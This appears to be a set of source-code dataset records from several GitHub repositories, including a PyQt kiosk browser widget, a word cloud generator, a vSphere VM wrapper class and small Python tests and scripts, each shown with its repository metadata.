        # The starting point contributes no cost to a path.
        return 0
| 49
| 1
| 83
|
df433c4a7339699215931d516699a115b7d6a36b
| 318
|
py
|
Python
|
app/tests/unit/test_log_use_cases.py
|
bda-19fs/bda-chatbot
|
4fcbda813ff5d3854a4c2e12413775676bcba9e2
|
[
"MIT"
] | 1
|
2019-05-25T12:12:39.000Z
|
2019-05-25T12:12:39.000Z
|
app/tests/unit/test_log_use_cases.py
|
bda-19fs/bda-chatbot
|
4fcbda813ff5d3854a4c2e12413775676bcba9e2
|
[
"MIT"
] | null | null | null |
app/tests/unit/test_log_use_cases.py
|
bda-19fs/bda-chatbot
|
4fcbda813ff5d3854a4c2e12413775676bcba9e2
|
[
"MIT"
] | null | null | null |
import logging
from bda_core.use_cases.log.log_info import log_info
| 28.909091
| 59
| 0.72956
|
import logging
from bda_core.use_cases.log.log_info import log_info
def test_log_info(capsys):
    """log_info should emit the message via the root logger's stderr handler."""
    logging.getLogger().addHandler(logging.StreamHandler())
    expected = 'I am in a unit test\n'
    log_info(msg='I am in a unit test', log=logging)
    captured_err = capsys.readouterr().err
    assert captured_err == expected
| 226
| 0
| 23
|
5f4be6e4666e04d53f03216c425c40dad46daa50
| 2,980
|
py
|
Python
|
kiosk/kiosk_browser/browser_widget.py
|
dividat/playos
|
fae198150789696b2c2d51cf099cb9f6c9563022
|
[
"MIT"
] | 1
|
2021-06-10T11:05:05.000Z
|
2021-06-10T11:05:05.000Z
|
kiosk/kiosk_browser/browser_widget.py
|
dividat/playos
|
fae198150789696b2c2d51cf099cb9f6c9563022
|
[
"MIT"
] | 45
|
2019-01-23T15:36:43.000Z
|
2022-03-29T08:23:30.000Z
|
kiosk/kiosk_browser/browser_widget.py
|
dividat/playos
|
fae198150789696b2c2d51cf099cb9f6c9563022
|
[
"MIT"
] | 7
|
2019-01-18T13:53:14.000Z
|
2021-02-03T10:17:51.000Z
|
import re
import urllib
import logging
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QShortcut
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineSettings
from PyQt5.QtWidgets import QSizePolicy
from kiosk_browser import system
def user_agent_with_system(user_agent, system_name, system_version):
    """Inject a specific system into a user agent string.

    If *user_agent* is a Mozilla-style UA ("Mozilla/5.0 (<details>) <rest>"),
    the system name/version pair is appended inside the parenthesised details
    section; otherwise the pair is simply prefixed to the whole string.

    :param user_agent: the browser's original user agent string
    :param system_name: name of the system to inject (e.g. "PlayOS")
    :param system_version: version string of the system
    :return: the user agent string with the system information injected
    """
    # Raw string for the regex; also escape the '.' in "5.0", which previously
    # matched any character.  Fixed `m == None` -> `m is None`.
    pattern = re.compile(r'(Mozilla/5\.0) \(([^\)]*)\)(.*)')
    m = pattern.match(user_agent)
    if m is None:
        # Not a Mozilla-style UA: just prefix the system info.
        return f"{system_name}/{system_version} {user_agent}"
    if not m.group(2):
        # Empty parentheses: no "; " separator needed.
        system_detail = f"{system_name} {system_version}"
    else:
        system_detail = f"{m.group(2)}; {system_name} {system_version}"
    return f"{m.group(1)} ({system_detail}){m.group(3)}"
| 35.903614
| 102
| 0.668792
|
import re
import urllib
import logging
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QShortcut
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineSettings
from PyQt5.QtWidgets import QSizePolicy
from kiosk_browser import system
class BrowserWidget(QWebEngineView):
    """Full-size web view for the kiosk.

    Adds proxy authentication, a system-identifying user agent, automatic
    reload on failed loads, and CTRL+R / CTRL+ALT+DELETE shortcuts.
    """
    def __init__(self, url, get_current_proxy, *args, **kwargs):
        # `get_current_proxy` is a zero-argument callable returning the current
        # proxy settings (or None); it is re-queried on every authentication
        # request so configuration changes are picked up.
        QWebEngineView.__init__(self, *args, **kwargs)
        # Register proxy authentication handler
        self.page().proxyAuthenticationRequired.connect(
            lambda url, auth, proxyHost: self._proxy_auth(
                get_current_proxy, url, auth, proxyHost))
        # Override user agent
        self.page().profile().setHttpUserAgent(user_agent_with_system(
            user_agent = self.page().profile().httpUserAgent(),
            system_name = system.NAME,
            system_version = system.VERSION
        ))
        # Allow sound playback without user gesture
        self.page().settings().setAttribute(QWebEngineSettings.PlaybackRequiresUserGesture, False)
        # Load url
        self.page().setUrl(url)
        # Shortcut to manually reload
        self.reload_shortcut = QShortcut('CTRL+R', self)
        self.reload_shortcut.activated.connect(self.reload)
        # Check if pages is correctly loaded
        self.loadFinished.connect(self._load_finished)
        # Shortcut to close
        self.quit_shortcut = QShortcut('CTRL+ALT+DELETE', self)
        self.quit_shortcut.activated.connect(lambda: self.close())
        # Stretch the browser
        policy = QSizePolicy()
        policy.setVerticalStretch(1)
        policy.setHorizontalStretch(1)
        policy.setVerticalPolicy(QSizePolicy.Preferred)
        policy.setHorizontalPolicy(QSizePolicy.Preferred)
        self.setSizePolicy(policy)
    def load(self, url):
        """Navigate the view to *url*."""
        self.page().setUrl(url)
    def _load_finished(self, success):
        # Retry after 5 seconds if the page failed to load.
        if not success:
            QTimer.singleShot(5000, self.reload)
    def _proxy_auth(self, get_current_proxy, url, auth, proxyHost):
        # Supply proxy credentials when both username and password are
        # configured; otherwise leave the request unanswered and log it.
        proxy = get_current_proxy()
        if proxy is not None and proxy.username is not None and proxy.password is not None:
            logging.info("Authenticating proxy")
            auth.setUser(proxy.username)
            auth.setPassword(proxy.password)
        else:
            logging.info("Proxy authentication request ignored because credentials are not provided.")
def user_agent_with_system(user_agent, system_name, system_version):
    """Inject a specific system into a user agent string.

    If *user_agent* is a Mozilla-style UA ("Mozilla/5.0 (<details>) <rest>"),
    the system name/version pair is appended inside the parenthesised details
    section; otherwise the pair is simply prefixed to the whole string.

    :param user_agent: the browser's original user agent string
    :param system_name: name of the system to inject (e.g. "PlayOS")
    :param system_version: version string of the system
    :return: the user agent string with the system information injected
    """
    # Raw string for the regex; also escape the '.' in "5.0", which previously
    # matched any character.  Fixed `m == None` -> `m is None`.
    pattern = re.compile(r'(Mozilla/5\.0) \(([^\)]*)\)(.*)')
    m = pattern.match(user_agent)
    if m is None:
        # Not a Mozilla-style UA: just prefix the system info.
        return f"{system_name}/{system_version} {user_agent}"
    if not m.group(2):
        # Empty parentheses: no "; " separator needed.
        system_detail = f"{system_name} {system_version}"
    else:
        system_detail = f"{m.group(2)}; {system_name} {system_version}"
    return f"{m.group(1)} ({system_detail}){m.group(3)}"
| 2,024
| 15
| 131
|
c9f09c526c716364169dbbaeba34b703a91c1d8a
| 2,625
|
py
|
Python
|
wordCloudGenerator.py
|
cwen96/Word-Cloud-Generator
|
0dcc23ad37f231230f80849b49de6448c84e3a7b
|
[
"MIT"
] | null | null | null |
wordCloudGenerator.py
|
cwen96/Word-Cloud-Generator
|
0dcc23ad37f231230f80849b49de6448c84e3a7b
|
[
"MIT"
] | null | null | null |
wordCloudGenerator.py
|
cwen96/Word-Cloud-Generator
|
0dcc23ad37f231230f80849b49de6448c84e3a7b
|
[
"MIT"
] | null | null | null |
#wordCloudGenerator.py
import wordcloud
from matplotlib import pyplot as plot
import tkinter
from tkinter.filedialog import askopenfile
#Reads the selected file and then draws the wordcloud
#Removes punctuation from words
#Calculates how many times each word appears in the text file
if __name__ == "__main__":
main()
| 37.5
| 117
| 0.610286
|
#wordCloudGenerator.py
import wordcloud
from matplotlib import pyplot as plot
import tkinter
from tkinter.filedialog import askopenfile
#Reads the selected file and then draws the wordcloud
def readFileAndDrawPlot():
    """Ask the user for a .txt file, read it and display its word cloud."""
    file = askopenfile(mode = 'rb', filetypes = [("Text Files", "*.txt")])
    fileContents = ""
    for i in file:
        # Lines come back as bytes (mode 'rb'); decode each line as UTF-8.
        fileContents += str(i, 'utf-8')
    drawPlot(fileContents)
def drawPlot(fileContents):
    """Render the word cloud for *fileContents* in a matplotlib window."""
    myimage = calculate_frequencies(fileContents)
    plot.imshow(myimage, interpolation = 'nearest')
    plot.axis('off')
    plot.show()
#Removes punctuation from words
def omit_punctuation(word, punctuation):
    """Return *word* with every character found in *punctuation* removed.

    Parameters
    ----------
    word : str
        Input word, possibly containing punctuation characters.
    punctuation : str
        Characters to strip from the word.
    """
    # Single C-level pass instead of a Python loop building a new string.
    return word.translate(str.maketrans('', '', punctuation))
#Calculates how many times each word appears in the text file
def calculate_frequencies(fileContents):
    """Count interesting word frequencies in *fileContents* and return the
    generated word-cloud image as an array suitable for ``plot.imshow``.

    Words are lowercased, stripped of punctuation, and dropped when they are
    non-alphabetic or in the stop-word list below.
    """
    #List of punctuations and uninteresting words to be excluded from the wordcloud
    punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
    uninteresting_words = ["the", "a", "to", "if", "is", "it", "of", "and", "or", "an", "as", "i", "me", "my", \
    "we", "our", "ours", "you", "your", "yours", "he", "she", "him", "his", "her", "hers", "its", "they", "them", \
    "their", "what", "which", "who", "whom", "this", "that", "am", "are", "was", "were", "be", "been", "being", \
    "have", "has", "had", "do", "does", "did", "but", "at", "by", "with", "from", "here", "when", "where", "how", \
    "all", "any", "both", "each", "few", "more", "some", "such", "no", "nor", "too", "very", "can", "will", "just", \
    "for", "in", "not", "into", "so"]
    wordCount = {}
    for word in fileContents.split():
        lowercase = word.lower()
        lowercase = omit_punctuation(lowercase, punctuations)
        # Skip anything that is not purely alphabetic or is a stop word.
        if not lowercase.isalpha() or lowercase in uninteresting_words:
            continue
        if lowercase in wordCount:
            wordCount[lowercase] += 1
        else:
            wordCount[lowercase] = 1
    #wordcloud
    cloud = wordcloud.WordCloud()
    cloud.generate_from_frequencies(wordCount)
    return cloud.to_array()
def main():
    """Build the Tk window that lets the user pick a text file to visualise."""
    #GUI
    root = tkinter.Tk()
    root.title("Word Cloud Generator")
    root.geometry("300x100")
    textFrame = tkinter.Frame(root)
    textFrame.pack()
    label = tkinter.Label(textFrame, text = "Please open a text file", foreground="black",font=("Calibri", 20))
    label.pack(side = tkinter.TOP)
    # The Browse button triggers the file dialog and the word-cloud rendering.
    button = tkinter.Button(textFrame, text = "Browse...", command = readFileAndDrawPlot)
    button.pack(side = tkinter.BOTTOM)
    root.mainloop()
if __name__ == "__main__":
main()
| 2,179
| 0
| 112
|
8278d8338dc03e1303d76a76e15b4eab9b77b17e
| 400
|
py
|
Python
|
examples/apps/GetImage/GetImage.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 14
|
2018-08-16T09:11:39.000Z
|
2019-12-07T12:54:32.000Z
|
examples/apps/GetImage/GetImage.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 2
|
2019-08-23T23:31:10.000Z
|
2020-06-17T09:21:57.000Z
|
examples/apps/GetImage/GetImage.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 7
|
2018-10-02T01:46:43.000Z
|
2021-06-04T19:10:47.000Z
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright(c) 2018 Senscape Corporation.
# License: Apache 2.0
# Import libs
import cv2, sys, numpy as np
sys.path.append('../../../')
import hsapi as hs
device = hs.GetDevice()
device.OpenDevice()
try:
while(1):
image = device.GetImage(False)
cv2.imshow('image',image)
cv2.waitKey(1)
finally:
device.CloseDevice()
| 18.181818
| 41
| 0.6325
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright(c) 2018 Senscape Corporation.
# License: Apache 2.0
# Import libs
import cv2, sys, numpy as np
sys.path.append('../../../')
import hsapi as hs
# Open the first Horned Sungem device found.
device = hs.GetDevice()
device.OpenDevice()
try:
    # Continuously grab frames from the device and display them;
    # the loop runs until the process is interrupted.
    while(1):
        image = device.GetImage(False)
        cv2.imshow('image',image)
        cv2.waitKey(1)
finally:
    # Always release the device, even on interrupt or error.
    device.CloseDevice()
| 0
| 0
| 0
|
7ce2de320184ff667c45ca79b9e4aac27a385587
| 1,062
|
py
|
Python
|
src/cactus/faces/cactus_fillAdjacenciesTest.py
|
Robin-Rounthwaite/cactus
|
3c612779b83b75cb42e08dc143b9cb81c257cf80
|
[
"MIT-0"
] | 1
|
2020-12-16T07:08:29.000Z
|
2020-12-16T07:08:29.000Z
|
src/cactus/faces/cactus_fillAdjacenciesTest.py
|
Robin-Rounthwaite/cactus
|
3c612779b83b75cb42e08dc143b9cb81c257cf80
|
[
"MIT-0"
] | null | null | null |
src/cactus/faces/cactus_fillAdjacenciesTest.py
|
Robin-Rounthwaite/cactus
|
3c612779b83b75cb42e08dc143b9cb81c257cf80
|
[
"MIT-0"
] | null | null | null |
#!/usr/bin/env python3
#Copyright (C) 2009-2011 by Benedict Paten (benedictpaten@gmail.com)
#
#Released under the MIT license, see LICENSE.txt
import unittest
import sys
from sonLib.bioio import TestStatus
from cactus.shared.test import getCactusInputs_random
from cactus.shared.test import getCactusInputs_blanchette
from cactus.shared.test import runWorkflow_multipleExamples
if __name__ == '__main__':
unittest.main()
| 35.4
| 142
| 0.708098
|
#!/usr/bin/env python3
#Copyright (C) 2009-2011 by Benedict Paten (benedictpaten@gmail.com)
#
#Released under the MIT license, see LICENSE.txt
import unittest
import sys
from sonLib.bioio import TestStatus
from cactus.shared.test import getCactusInputs_random
from cactus.shared.test import getCactusInputs_blanchette
from cactus.shared.test import runWorkflow_multipleExamples
class TestCase(unittest.TestCase):
    """End-to-end workflow tests for cactus adjacency filling."""
    @TestStatus.longLength
    def testCactus_Random(self):
        # Run the full workflow on randomly generated inputs; the repetition
        # count comes from the configured test setup.
        runWorkflow_multipleExamples(self.id(), getCactusInputs_random,
                                     testNumber=TestStatus.getTestSetup(),
                                     buildAvgs=True)
    @unittest.skip("test was never updated when changes were made to the way ancestors work (ERROR: Couldn't find reference event reference)")
    @TestStatus.longLength
    def testCactus_Blanchette(self):
        runWorkflow_multipleExamples(self.id(), getCactusInputs_blanchette,
                                     buildAvgs=True)
if __name__ == '__main__':
unittest.main()
| 347
| 263
| 23
|
829a2dee42cf284eaec4c66674bea0c8190e627a
| 6,680
|
py
|
Python
|
k8_vmware/vsphere/VM.py
|
aduvukace/k8-vmware
|
128a87731e342208c683e26ba79993a365d63f4b
|
[
"Apache-2.0"
] | null | null | null |
k8_vmware/vsphere/VM.py
|
aduvukace/k8-vmware
|
128a87731e342208c683e26ba79993a365d63f4b
|
[
"Apache-2.0"
] | null | null | null |
k8_vmware/vsphere/VM.py
|
aduvukace/k8-vmware
|
128a87731e342208c683e26ba79993a365d63f4b
|
[
"Apache-2.0"
] | null | null | null |
import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
| 39.526627
| 144
| 0.580689
|
import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
class VM:
    """Convenience wrapper around a pyVmomi virtual-machine object.

    Exposes device/controller lookups, power operations, keystroke sending
    and a summary `info()` dict, while minimising round-trips to the server
    (each access to `self.vm.summary` is a REST call).
    """
    def __init__(self, vm):
        # `vm` is the underlying pyVmomi VirtualMachine managed object.
        self.vm = vm
    def config(self):
        return self.summary().config
    def controller_scsi(self):
        controllers = self.devices_SCSI_Controllers()
        if len(controllers) > 0:
            return controllers[0] # default to returning the first one
    def controller_ide(self):
        controllers = self.devices_IDE_Controllers()
        if len(controllers) > 0:
            return controllers[0] # default to returning the first one
    def controller_ide_free_slot(self):
        # An IDE controller can hold at most 2 devices; return the first with room.
        controllers = self.devices_IDE_Controllers()
        for controller in controllers:
            if len(controller.device) < 2:
                return controller
    def devices(self):
        return self.vm.config.hardware.device
    def devices_IDE_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualIDEController )
    def devices_Cdroms (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualCdrom )
    def devices_Disks (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualDisk )
    def devices_AHCI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualAHCIController )
    def devices_PCNet_32s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualPCNet32 )
    def devices_Vmxnet_2s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet2 )
    def devices_Vmxnet_3s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet3 )
    def devices_E1000s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000 )
    def devices_E1000es (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000e )
    def devices_SCSI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSCSIController )
    def devices_Sriov_EthernetCards (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSriovEthernetCard )
    def devices_of_type(self, type):
        # NOTE: parameter name shadows the builtin `type`; kept for
        # backward compatibility with keyword callers.
        devices = []
        for device in self.devices():
            if isinstance(device, type):
                devices.append(device)
        return devices
    def devices_indexed_by_label(self):
        devices = {}
        for device in self.devices():
            key = device.deviceInfo.label
            value = device
            devices[key] = value
        return devices
    def guest(self):
        return self.summary().guest
    def id(self):
        return f"vim.{self.vm._wsdlName}:{self.vm._moId}"
    #note: we can also get this value from these methods (but they will do an extra request to the server)
    # str(self.resource_config().entity)
    # self.summary().vm
    def info(self):
        """Return a dict of commonly used VM facts from a single summary call."""
        summary = self.summary() # need to do this since each reference to self.vm.summary.config is call REST call to the server
        #print(summary)
        config = summary.config # these values are retrieved on the initial call to self.vm.summary
        guest = summary.guest # using self.vm.summary.guest here would had resulted in two more REST calls
        runtime = summary.runtime
        info = {
            "Boot_Time" : str(runtime.bootTime) ,
            "Connection_State" : runtime.connectionState,
            "Guest_Id" : config.guestId ,
            "Guest_Full_Name" : config.guestFullName ,
            "Host" : runtime.host ,
            "Host_Name" : guest.hostName ,
            "IP" : guest.ipAddress ,
            "Memory_Size_MB" : config.memorySizeMB ,
            "MOID" : self.vm._moId ,
            "Name" : config.name ,
            "Max_Cpu_Usage" : runtime.maxCpuUsage ,
            "Max_Memory_Usage" : runtime.maxMemoryUsage ,
            "Notes" : config.annotation ,
            "Num_Cpu" : config.numCpu ,
            "Path_Name" : config.vmPathName ,
            "State_State" : runtime.powerState ,
            "Question" : None ,
            "UUID" : config.uuid
        }
        # if guest != None: info['IP'] = guest.ipAddress
        # BUGFIX: the original had a trailing comma here, which stored a
        # 1-tuple instead of the question text; also use `is not None`.
        if runtime.question is not None: info['Question'] = runtime.question.text
        return info
    def hardware(self):
        return self.vm.config.hardware
    def host_name(self):
        return self.guest().hostName
    def ip(self):
        return self.guest().ipAddress
    def name(self):
        return self.config().name
    def moid(self):
        return str(self.vm._moId)
    def powered_state(self):
        return self.runtime().powerState
    def power_on(self):
        return self.task().power_on()
    def power_off(self):
        return self.task().power_off()
    def powered_on(self):
        return self.powered_state() == 'poweredOn'
    def powered_off(self):
        return self.powered_state() == 'poweredOff'
    def resource_config(self):
        return self.vm.resourceConfig
    def screenshot(self, target_file=None):
        from k8_vmware.vsphere.VM_Screenshot import VM_Screenshot
        return VM_Screenshot(self, target_file=target_file).download()
    def send_text(self, text):
        VM_Keystroke(self).send_text(text)
        return self
    def send_key(self, text):
        result = VM_Keystroke(self).send_key(text)
        return self
    def send_enter(self):
        VM_Keystroke(self).enter()
        return self
    def summary(self):
        return self.vm.summary # will make REST call to RetrievePropertiesEx
    def task(self):
        from k8_vmware.vsphere.VM_Task import VM_Task # have to do this import here due to circular dependencies (i.e. VM_Task imports VM)
        return VM_Task(self)
    def runtime(self):
        return self.vm.summary.runtime
    def uuid(self):
        return self.config().uuid
    def wait(self, seconds): # to help with fluent code
        wait(seconds)
        return self
    def __str__(self):
        return f'[VM] {self.name()}'
| 5,405
| -12
| 1,172
|
8aa1d75f638cfc7d435e032ffae08cc74818678a
| 127
|
py
|
Python
|
genetic-algorithm-flyfood/testes/teste/change.py
|
JessyLeal/flyfood
|
5b0ec6b1b86078208202019a8096df0fdbe6c3b3
|
[
"MIT"
] | 1
|
2022-03-13T20:22:50.000Z
|
2022-03-13T20:22:50.000Z
|
genetic-algorithm-flyfood/testes/teste/change.py
|
JessyLeal/flyfood
|
5b0ec6b1b86078208202019a8096df0fdbe6c3b3
|
[
"MIT"
] | null | null | null |
genetic-algorithm-flyfood/testes/teste/change.py
|
JessyLeal/flyfood
|
5b0ec6b1b86078208202019a8096df0fdbe6c3b3
|
[
"MIT"
] | null | null | null |
# Swap the positions of two known elements in a list.
lista = ['oi', 'bem', 'meu']
pos_bem = lista.index('bem')
pos_meu = lista.index('meu')
lista[pos_bem], lista[pos_meu] = lista[pos_meu], lista[pos_bem]
print(lista)
| 31.75
| 45
| 0.590551
|
# Swap the positions of two known elements in a list.
lista = ['oi', 'bem', 'meu']
pos_bem = lista.index('bem')
pos_meu = lista.index('meu')
lista[pos_bem], lista[pos_meu] = lista[pos_meu], lista[pos_bem]
print(lista)
| 0
| 0
| 0
|